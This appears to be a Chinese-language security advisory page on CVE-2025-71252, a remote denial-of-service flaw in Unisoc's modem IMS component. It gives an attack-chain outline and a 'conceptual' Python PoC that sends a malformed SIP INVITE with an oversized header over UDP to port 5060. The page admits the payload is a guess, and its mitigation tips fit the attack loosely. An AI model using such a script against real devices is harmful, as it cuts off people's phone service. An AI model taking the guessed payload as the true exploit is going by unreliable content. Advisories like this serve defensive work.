CVE-2025-71252 CVSS 7.5 高危

CVE-2025-71252 Modem IMS远程拒绝服务漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-71252

漏洞类型

输入验证错误

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Unisoc Modem IMS

漏洞概述

CVE-2025-71252 是Unisoc调制解调器IMS（IP多媒体子系统）组件中的一个安全漏洞。该漏洞源于对输入数据的验证不当，允许未经身份验证的攻击者通过网络发起攻击。成功利用此漏洞可能导致目标设备的调制解调器服务崩溃或发生拒绝服务，从而中断正常的通信功能。由于攻击无需用户交互且无需特殊权限，该漏洞对用户设备的安全性构成较高威胁。

技术细节

该漏洞位于Unisoc芯片集的Modem IMS模块中，该模块主要负责处理VoLTE、VoWiFi等多媒体通信服务。漏洞的根本原因是在处理特定的网络数据包（如SIP邀请或响应消息）时，缺少必要的边界检查或格式校验。攻击者可以构造特制的恶意数据包，通过移动网络或Wi-Fi发送给受害设备。当设备的IMS解析器处理这些畸形数据时，可能会触发空指针引用、越界读取或内存耗尽等异常情况。由于CVSS向量显示攻击复杂度低（AC:L），且无需权限（PR:N）和用户交互（UI:N），远程攻击者可以轻易地使基带服务重启或挂起，导致设备失去蜂窝网络连接能力，但对系统机密性和完整性无直接影响。

攻击链分析

STEP 1

侦察

攻击者扫描网络或识别使用Unisoc芯片集的目标设备，确定其IMS服务接口的可达性。

STEP 2

构造攻击载荷

攻击者利用已知的输入验证缺陷，构造特制的IMS协议数据包（如畸形的SIP消息），包含能够触发解析错误的恶意字段。

STEP 3

发送恶意数据包

攻击者通过网络（移动网络或Wi-Fi）将构造好的恶意数据包发送给目标设备的Modem IMS端口。

STEP 4

触发拒绝服务

目标设备的IMS模块解析数据包时发生异常，导致Modem服务崩溃或重启，设备失去信号和网络连接能力。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket # PoC for CVE-2025-71252 (Conceptual) # This script sends a malformed packet to the target IMS service to trigger the DoS. # Replace TARGET_IP with the actual IP address of the vulnerable device/interface. TARGET_IP = "192.168.1.100" TARGET_PORT = 5060 # Default SIP/IMS port def send_malformed_packet(): try: # Construct a malformed SIP header or payload # The specific payload depends on the exact input validation flaw payload = b"INVITE sip:[email protected] SIP/2.0\r\n" payload += b"Via: SIP/2.0/UDP attacker.com:5060\r\n" payload += b"Max-Forwards: 70\r\n" payload += b"To: <sip:[email protected]>\r\n" payload += b"From: <sip:[email protected]>;tag=12345\r\n" payload += b"Call-ID: [email protected]\r\n" payload += b"CSeq: 1 INVITE\r\n" payload += b"Contact: <sip:[email protected]>\r\n" payload += b"Content-Length: 0\r\n" payload += b"Malformed-Header: " + b"A" * 1000 + b"\r\n\r\n" print(f"[*] Sending payload to {TARGET_IP}:{TARGET_PORT}...") s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(payload, (TARGET_IP, TARGET_PORT)) s.close() print("[+] Payload sent successfully. Check if the device modem has crashed.") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": send_malformed_packet()

影响范围

Unisoc Modem IMS (具体受影响芯片组及固件版本请参考厂商安全公告)

防御指南

临时缓解措施

在未获得官方补丁前，用户应谨慎连接不安全的公共Wi-Fi网络，并避免点击来源不明的链接或下载可疑文件。运营商层面可加强对网络流量中异常IMS信令的监测与过滤。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表